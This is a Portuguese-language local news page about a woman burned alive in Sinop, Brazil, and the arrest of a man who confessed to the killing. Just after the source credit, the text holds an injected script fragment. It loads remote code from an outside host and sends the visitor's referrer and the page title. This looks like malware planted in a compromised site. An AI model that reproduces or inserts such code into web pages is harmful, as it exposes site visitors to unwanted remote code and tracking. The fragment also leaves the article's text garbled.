Capa / Em Destaque / CRUELDADE SEM LIMITES: Homem confessa que ateou fogo em mulher ainda viva

CRUELDADE SEM LIMITES: Homem confessa que ateou fogo em mulher ainda viva

thumbsA Divisão de Homicídios e Proteção à Pessoa (DHPP) solucionou o caso da mulher que foi morta carbonizada nesse final de semana, em Sinop. De acordo com o delegado da DHPP, Carlos Eduardo Muniz, um homem confessou a autoria do assassinato e disse que a vítima, que até então não havia sido identificada, seria Neuza, conhecida como “Neguinha”.

José de Souza Silva, vulgo “Trator”, de 26 anos, foi preso nesta quarta-feira (1). Em depoimento, ele disse à polícia que colocou fogo na mulher quando ela ainda estava viva.

O crime
O corpo de uma mulher, carbonizado, foi encontrado na manhã de sábado (28), na Praça da Bíblia, próximo à uma árvore, na região central de Sinop. Segundo a Polícia Militar (PM), populares viram o fogo e acionaram o Corpo de Bombeiros.

O Corpo de Bombeiros esteve no local e controlou o fogo. A Perícia Técnica foi acionada para ajudar nos trabalhos de identificação da vítima e de acordo com o oficial do dia da Polícia Militar, acredita-se que a mulher teria sido esfaqueada e depois queimada.

Fonte: Nova Ediçãos.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top